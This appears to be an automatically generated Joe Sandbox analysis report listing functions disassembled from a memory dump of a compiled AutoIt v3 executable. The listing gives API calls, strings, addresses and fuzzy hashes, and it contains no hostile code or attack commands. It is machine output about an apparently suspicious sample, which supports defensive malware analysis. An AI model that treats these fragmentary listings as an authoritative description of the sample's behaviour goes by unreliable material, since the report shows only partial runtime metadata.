Opcode Fuzzy Hash: 48abc45b03ed9680a70d832403a8449360ee8ab0cd20b2e9bf48afa557169fde
Instruction Fuzzy Hash: 7391DE31609201AFD726DF14C898B16BBE4FF49318F1589A9F5698B6E2C730EC85CF81

Function 0028F6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

t55t55, xrefs: 0028F97E
t55, xrefs: 0028FBB1
t55, xrefs: 002D463C
t55, xrefs: 0028F8E0
t55, xrefs: 002D45E9
Variable must be of type 'Object'., xrefs: 002D48C6

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.$t55$t55$t55$t55$t55t55
API String ID: 0-3810081622
Opcode ID: 9230fc04a30668c62ad00a6c49ea799e98c3bd63cf7eee3e846c1b69c4ba0404
Instruction ID: 1fd6fbca24dd279e8a656ebab60b578de261c97976a1295487fd922b6f61d99f
Opcode Fuzzy Hash: 9230fc04a30668c62ad00a6c49ea799e98c3bd63cf7eee3e846c1b69c4ba0404
Instruction Fuzzy Hash: 65C2AE79E21205CFDB64EF58C980AADB7B1BF09310F24816AE905AB391D771ED61CF90

Function 00290340 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 002915F2

Strings

t55, xrefs: 002906B7
t55t55, xrefs: 0029075B
t55, xrefs: 002D5FF9
t55, xrefs: 002D604D
t55, xrefs: 00290A6A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Init_thread_footer
String ID: t55$t55$t55$t55$t55t55
API String ID: 1385522511-1910863711
Opcode ID: 25a61db6512ef046a06a9b8c6059b2141417c187573c23e3f6ea5874f7cc3482
Instruction ID: 13f60d6e9ae8d8a952a131d09f358e758b6e5736200b4b38681fc3e85183ab9b
Opcode Fuzzy Hash: 25a61db6512ef046a06a9b8c6059b2141417c187573c23e3f6ea5874f7cc3482
Instruction Fuzzy Hash: 8FB27974A28306CFDB24CF19C480A2AB7E1BF99304F14495EE9898B361D771ED65CF92

Function 00282793 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0028327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002832AF
Part of subcall function 0028327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 002832B7
Part of subcall function 0028327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002832C2
Part of subcall function 0028327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002832CD
Part of subcall function 0028327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 002832D5
Part of subcall function 0028327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 002832DD

Part of subcall function 00283205: RegisterWindowMessageW.USER32(00000004,?,00282964), ref: 0028325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00282A0A
OleInitialize.OLE32 ref: 00282A28
CloseHandle.KERNEL32(00000000,00000000), ref: 002C3A0D

Strings

4'5, xrefs: 00282948
$5, xrefs: 0028280A
d(5, xrefs: 00282964
(&5, xrefs: 00282932
0$5, xrefs: 00282A2E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: (&5$0$5$4'5$d(5$$5
API String ID: 1986988660-2642881581
Opcode ID: bbb9c036f33bcd416f98100dd5548896405ce64758f93426966b555c6d43e921
Instruction ID: 0c6a13cd57f8df03b789021015a7d445100579c13b857177015af6bc5f5810ac
Opcode Fuzzy Hash: bbb9c036f33bcd416f98100dd5548896405ce64758f93426966b555c6d43e921
Instruction Fuzzy Hash: CE71BFB59113408EC78BEF7AAD65617BBE8BB5B302B40892AE409C72B1FB704445CF54

Function 002B90C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02d7b4c6207489bddd96bae5ed9c43a7b98b882588753adb4c0cea8d2ec86053
Instruction ID: c1e59d2cde3f99a7081ca5d25b9240b37c70589a204947365053018df4ee3ede
Opcode Fuzzy Hash: 02d7b4c6207489bddd96bae5ed9c43a7b98b882588753adb4c0cea8d2ec86053
Instruction Fuzzy Hash: E1C1067092434AAFCF11DFE8D841BEDBBB4AF0A340F144195E664A7392C73499A1CF61

Function 002835B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002835E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00283602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00283368,?), ref: 00283616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00283368,?), ref: 0028361F

Strings

AutoIt v3, xrefs: 002835D9, 002835DE, 002835DF
edit, xrefs: 002835FC

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 93925ea049909704eecd01d228fd2fb85119eaac61b71406d6c6bb5a5ba131a6
Instruction ID: 1ea1124564d28044df20c81cc7cdf5674c452c12067a508fad723aa3096e635b
Opcode Fuzzy Hash: 93925ea049909704eecd01d228fd2fb85119eaac61b71406d6c6bb5a5ba131a6
Instruction Fuzzy Hash: DEF0DA796413947AE7335B17AC08E772FBDD7CBF51F00401EB904A71B0D6691891DAB0

Function 002861A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002C5287

Part of subcall function 00288577: _wcslen.LIBCMT ref: 0028858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00286299

Strings

AutoIt - , xrefs: 0028620D
Line %d: , xrefs: 002C5305

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: de95ca71a52608bff22876eb1831d88a789f79f121224ac83a2d87355bffecd4
Instruction ID: ab76d6d3853df256eb9266e417706d75dddca604eba6f45cba14f7a46599c1d0
Opcode Fuzzy Hash: de95ca71a52608bff22876eb1831d88a789f79f121224ac83a2d87355bffecd4
Instruction Fuzzy Hash: A941A175429311AAC311FB20DC45ADF77DCAF49310F00462EF989921E1EF74A669CB92

Function 002B8A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32(00000000,00000000,?,OV,,002B894C,?,00349CE8,0000000C,002B89AB,?,OV,,?,002C564F), ref: 002B8A84
GetLastError.KERNEL32 ref: 002B8A8E
__dosmaperr.LIBCMT ref: 002B8AB9

Strings

OV,, xrefs: 002B8A30

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: OV,
API String ID: 2583163307-1522435550
Opcode ID: 0055ec7da3756e86247709269bdda57fb6a28936e76c744d164f1796fa4f6dc8
Instruction ID: c1dbf8d04d668d1209ce6015d43c070ca910c5c8528e9c10a03b598a5543573b
Opcode Fuzzy Hash: 0055ec7da3756e86247709269bdda57fb6a28936e76c744d164f1796fa4f6dc8
Instruction Fuzzy Hash: D5018E326351701BC6216634AC457FEA75D4B82BF4F2D021AF92C8F1D2DF708DA1D980

Function 002858CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,002858BE,SwapMouseButtons,00000004,?), ref: 002858EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,002858BE,SwapMouseButtons,00000004,?), ref: 00285910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,002858BE,SwapMouseButtons,00000004,?), ref: 00285932

Strings

Control Panel\Mouse, xrefs: 002858ED

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 6383556392d39c61059f2868eb986200698cfe11ec881f27159aa5a4e14c8399
Instruction ID: e0eac5b01b9174069ed8e2ffeabc69134e95762d0565d72d6fba97297537b711
Opcode Fuzzy Hash: 6383556392d39c61059f2868eb986200698cfe11ec881f27159aa5a4e14c8399
Instruction Fuzzy Hash: C6117C79522628FFDB219F64CC80EEE77BCEF09760F108459F801E7250E2719E5197A0

Function 00292B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00293006

Strings

CALL, xrefs: 00292FD6
bn., xrefs: 00292B36, 00292E8D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL$bn.
API String ID: 1385522511-2256434996
Opcode ID: 6fda90c34fd9ac23e1b3412a11ac05532a90a14af7656e5c13d3ad221f72b49d
Instruction ID: 72e64be21c831e2026cd5d9139a81c1761b069206845b4956a1cc2e6d962f09d
Opcode Fuzzy Hash: 6fda90c34fd9ac23e1b3412a11ac05532a90a14af7656e5c13d3ad221f72b49d
Instruction Fuzzy Hash: 26228C70628202EFCB14DF14C880A2ABBF1BF89314F14895EF4898B3A1D775ED65CB52

Function 00283A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 002C413B

Part of subcall function 00285851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002855D1,?,?,002C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00285871

Part of subcall function 00283A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00283A76

Strings

X, xrefs: 002C4109
`u4, xrefs: 002C4134

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`u4
API String ID: 779396738-3661298008
Opcode ID: 16b5885f5edd122a993c9a3f70950fd8250431be85d632327c22efa77e10e6fd
Instruction ID: 1abcc12eccdc539691ef73f1f422fdbb19add44879c9d2f0722c227aa5eef8c0
Opcode Fuzzy Hash: 16b5885f5edd122a993c9a3f70950fd8250431be85d632327c22efa77e10e6fd
Instruction Fuzzy Hash: C8210875A112589BCF01EF94C805BEE7BFC9F49700F008059E444BB281DFF49A998F61

Function 002A014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 002A09D8

Part of subcall function 002A3614: RaiseException.KERNEL32(?,?,?,002A09FA,?,00000000,?,?,?,?,?,?,002A09FA,00000000,00349758,00000000), ref: 002A3674

__CxxThrowException@8.LIBVCRUNTIME ref: 002A09F5

Strings

Unknown exception, xrefs: 002A0A02

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: b23e3bb48e22be2a246b995779f2cd9a82081f1ef2d19e05f53e5ad652652abc
Instruction ID: b73ec240096ae05cbe867c484eee5fb8aa8ff184a69b2e8997e1ff36e63affce
Opcode Fuzzy Hash: b23e3bb48e22be2a246b995779f2cd9a82081f1ef2d19e05f53e5ad652652abc
Instruction Fuzzy Hash: 6DF0A43492020EB78B00BEA4D88699F776C5A02750B504121B91896592EF70EA3ACAD0

Function 003089B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00308D52
TerminateProcess.KERNEL32(00000000), ref: 00308D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00308F3A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 580ea8461c332d1340b2aa28302a8caf252cc1af673655d7b53533e14b5c9aff
Instruction ID: 7b1a230e5ab5ebcb2801fb930ed4714402289acec92fd73701cd60dc53b88471
Opcode Fuzzy Hash: 580ea8461c332d1340b2aa28302a8caf252cc1af673655d7b53533e14b5c9aff
Instruction Fuzzy Hash: 78128A71A09301DFD711DF28C490B6ABBE5FF89318F05895DE8898B292DB30E945CF92

Function 00309AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00309B87
_strcat.LIBCMT ref: 00309BC6
_wcslen.LIBCMT ref: 00309C14

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: 665b7ccbc6c0ba44904d0977112db9188021964d2adbca42e2ee4ad731821f68
Instruction ID: 1128fc35787dad845152d0460d1273aa90d36c3dc66e2e859c7c606e071fd62b
Opcode Fuzzy Hash: 665b7ccbc6c0ba44904d0977112db9188021964d2adbca42e2ee4ad731821f68
Instruction Fuzzy Hash: 6AA18D34605605DFDB18DF18C5E1A69B7A5FF45314B6084AEE80A8F693DB31ED51CF80

Function 0029FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 002861A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00286299

KillTimer.USER32(?,00000001,?,?), ref: 0029FD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0029FD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002DFE33

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: ae6f94b6db075ac4a018c319e1a15750bf084c0270763a485e24f391ccd26844
Instruction ID: 5b6b08f19667f7fb5681055a57225d883c08990eb59772717b0847d84064692d
Opcode Fuzzy Hash: ae6f94b6db075ac4a018c319e1a15750bf084c0270763a485e24f391ccd26844
Instruction Fuzzy Hash: AF31D171910344AFEBA28F248845BE7BBECAB02308F0044AED6DA97242C7741E94CB55

Function 002B970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,002B97BA,FF8BC369,00000000,00000002,00000000), ref: 002B9744
GetLastError.KERNEL32(?,002B97BA,FF8BC369,00000000,00000002,00000000,?,002B5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,002A6F41), ref: 002B974E
__dosmaperr.LIBCMT ref: 002B9755

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 51f9dc4144cac775471d3006ea45977549a6f8f4ee4192aa1ed51fc250593324
Instruction ID: 3adfd80ee5011b08a5aee574491a493baaeb2dc774cec79bba94680a6b4bcc02
Opcode Fuzzy Hash: 51f9dc4144cac775471d3006ea45977549a6f8f4ee4192aa1ed51fc250593324
Instruction Fuzzy Hash: 4F014C32630515ABCB159F99DC05CEEBB6DDB86370F244319F9218B190EE70DDA2EB90

Function 00291990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d82fbad130d055e9e36e832a99a3a317a052ed4e67e4aa91792b8c5da8581b59
Instruction ID: 5bd053ec50e8071a11d33a6d322bc8457d1fd9eb7a3516cf766563558a849f8a
Opcode Fuzzy Hash: d82fbad130d055e9e36e832a99a3a317a052ed4e67e4aa91792b8c5da8581b59
Instruction Fuzzy Hash: 8132EE30A20206DFDF20DF55C895BAEB3B5AF05314F14856AE81AAB291DB71ED70CF51

Function 0028396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00283A3C

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 1af31f3c446ed1b8e47159e9417fce70deb212a84d9388eca060f6d2d4a9a72c
Instruction ID: 8818f3dde5bd10665f866e38b3964b1913cdd9cedd10021030d0b771520e787c
Opcode Fuzzy Hash: 1af31f3c446ed1b8e47159e9417fce70deb212a84d9388eca060f6d2d4a9a72c
Instruction Fuzzy Hash: 6231F574515701CFD321EF24D884797BBF8FB49708F00092EE6CA87290E7B0A958CB52

Function 0028331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 0028333D

Part of subcall function 002832E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002832FB
Part of subcall function 002832E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00283312

Part of subcall function 0028338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00283368,?), ref: 002833BB
Part of subcall function 0028338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00283368,?), ref: 002833CE
Part of subcall function 0028338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00352418,00352400,?,?,?,?,?,?,00283368,?), ref: 0028343A
Part of subcall function 0028338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00352418,?,?,?,?,?,?,?,00283368,?), ref: 002834BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00283377

